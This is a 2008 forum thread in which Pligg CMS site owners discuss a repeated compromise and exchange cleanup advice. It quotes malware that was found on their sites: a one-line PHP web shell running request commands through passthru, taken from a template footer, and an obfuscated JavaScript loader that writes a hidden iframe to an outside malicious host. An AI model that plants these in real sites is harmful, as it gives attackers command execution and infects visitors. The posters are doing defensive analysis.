My Pligg site was hacked!!!

Register an Account
Pligg Chat Room
Closed Thread
 
LinkBack Thread Tools Display Modes
  #11 (permalink)  
Old 08-06-2008, 06:38 PM
Casual Pligger
 
Join Date: May 2007
Posts: 39
Quote:
Originally Posted by chuckroast View Post
upgrade to the latest version and remove the file admin_editor.php cause it's not used in the latest version, and if you are using an older version of pligg the upgrade wont delete the file from your folder.
Same problem follow your instructions!!
  #12 (permalink)  
Old 08-07-2008, 01:54 PM
catchpen's Avatar
Pligg Donor/Coder
 
Join Date: Feb 2008
Posts: 184
Quote:
Originally Posted by uTag View Post
I deleted the admin_editor.php a couple days ago and this morning my index.pp page was hacked again... sames JS/Wonka trojan... any other suggestions
My site (note even live yet grrr) got hacked too and then re hacked after 9.9.5. I changed my site database user name and password and deleted the admin_editor.php like Chuckroast mentioned so far no more hack crap.
I'm not sure if it's related but I had a JS/downloader trojan on my PC that supposed to send cookies keylogs etc. somehow to a malicious host. It wouldn't hurt to scan for spyware and virii on your PC too if you haven't yet.

CP
  #13 (permalink)  
Old 08-10-2008, 12:17 AM
catchpen's Avatar
Pligg Donor/Coder
 
Join Date: Feb 2008
Posts: 184
also check the footer in your template folder. I found
Code:
<cmdout><?php if ( !empty($_REQUEST["cmd"]) ) passthru($_REQUEST["cmd"]); ?></cmdout>
in mine. Hopefully it's remnants from 9.9. Anyone know where else to look?
  #14 (permalink)  
Old 08-10-2008, 12:50 AM
chuckroast's Avatar
Pligg Developer/Coder/Designer
Pligg Version: SVN
Pligg Template: Galleria
 
Join Date: Jun 2006
Location: PA
Posts: 3,759
Quote:
Originally Posted by uTag View Post
I deleted the admin_editor.php a couple days ago and this morning my index.pp page was hacked again... sames JS/Wonka trojan... any other suggestions
Hey uTag
Did you delete the contents of templates_c folder? This is the cache folder and even though the admin_editor.php was missing they could still be pulling it from that catch folder. Try deleting everything inside that folder.


Get the full Pligg Module Pack today.

Anyone want the domain MyHubb.com ? Bid Now!




  #15 (permalink)  
Old 08-24-2008, 06:26 PM
New Pligger
 
Join Date: Jun 2008
Posts: 3
My pligg was hacked too. While I took the suggested measures in this forum I also dug in to find out what was going on.

The script that was added just befor the closing body tag of my site has two parts. The first part simply unescapes a string which results in the following function:
<script language="javascript">
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCod e(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}
</script>

The second part runs the function passing it a string that gets parsed and written as the following:
<iframe src="http://sexonline.fake.hu/10/js_go_f1.php" style="display:none"></iframe>

The full encoded script that produces the above looks like:
<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20% 6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%2 8%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61% 70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C %65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E% 6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72 %69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%2 8%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74 %68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2 E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74% 29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286 Fliudph%2853vuf%286G%2855kwws%286D22vh%7Brqolqh1id nh1kx2432mvbjrbi41sks%2855%2853vw%7Coh%286G%2855gl vsod%7C%286Dqrqh%2855%286H%286F2liudph%286H3');
</script>

I have run across this before on some of the high volume sites that I manage. There are a lot of resources to tell you how to block the IP addresses of the common attackers, but that can always change.

The one successful way that we were able to get around it was to put a script in place that will cache your clean file structure, monitor it, and disallow any changes to it unless specified in the config file. It cannot "stop" the hacer, but it will ensure that if they do get in they cannot be successful in contaminating your site and scaring off your visitors.

I hope this helps someone...

Dan
  #16 (permalink)  
Old 08-26-2008, 10:43 PM
Yankidank's Avatar
Pligg Founder/Coder/Designer
Pligg Version: SVN
Pligg Template: Wistie
 
Join Date: Dec 2005
Location: Ocala, FL
Posts: 3,703
Send a message via AIM to Yankidank Send a message via Skype™ to Yankidank
Have you tried resetting all of your passwords, I'm suggesting Pligg, FTP, Mysql, etc. passwords that might have been discovered.

Now Available: Facebook Connect Module !
  #17 (permalink)  
Old 08-27-2008, 12:43 PM
New Pligger
 
Join Date: May 2008
Posts: 3
Dan, which file(s) does this code appear in? I was hacked too and am trying to fix. Thanks.

Quote:
Originally Posted by dbish View Post

The script that was added just befor the closing body tag of my site has two parts. The first part simply unescapes a string which results in the following function:
<script language="javascript">
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCod e(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}
</script>

The second part runs the function passing it a string that gets parsed and written as the following:
<iframe src="http://sexonline.fake.hu/10/js_go_f1.php" style="display:none"></iframe>
Dan
  #18 (permalink)  
Old 09-07-2008, 11:43 PM
New Pligger
Pligg Version: 9.95
 
Join Date: Aug 2008
Location: China
Posts: 23
My god!
Any solutions?
  #19 (permalink)  
Old 09-16-2008, 03:28 AM
New Pligger
Pligg Version: 9.95
 
Join Date: Aug 2008
Location: China
Posts: 23
Is that true?
Any ideas?
  #20 (permalink)  
Old 10-07-2008, 11:20 AM
New Pligger
Pligg Version: 9.90
Pligg Template: yget
 
Join Date: Aug 2007
Location: Manila
Posts: 9
Send a message via Yahoo to watsap
Quote:
Originally Posted by catchpen View Post
also check the footer in your template folder. I found
Code:
<cmdout><?php if ( !empty($_REQUEST["cmd"]) ) passthru($_REQUEST["cmd"]); ?></cmdout>
in mine. Hopefully it's remnants from 9.9. Anyone know where else to look?
got mine fixed

thanks
Closed Thread

Thread Tools
Display Modes


Similar Threads
Thread Thread Starter Forum Replies Last Post
Affiliate tip: Use phpBay API to show eBay listings on your pligg site! teachwny Questions and Comments 0 01-29-2009 03:12 PM
URGENT: Have 80% Pligg Design Done, Need Experienced Programmer/Designer to finish it anothercollegestudent Questions and Comments 3 11-07-2007 02:39 AM
How profitable is a Pligg site ? Ricky Questions and Comments 32 10-17-2007 04:42 AM
My Pligg Site forum closed until further notice Yankidank Questions and Comments 2 05-28-2007 01:46 AM


Pligg Modules and Pligg Templates from Pligg Pro Find support on the Pligg CMS Forum - 24 hours a day! Make a donation to support Pligg CMS development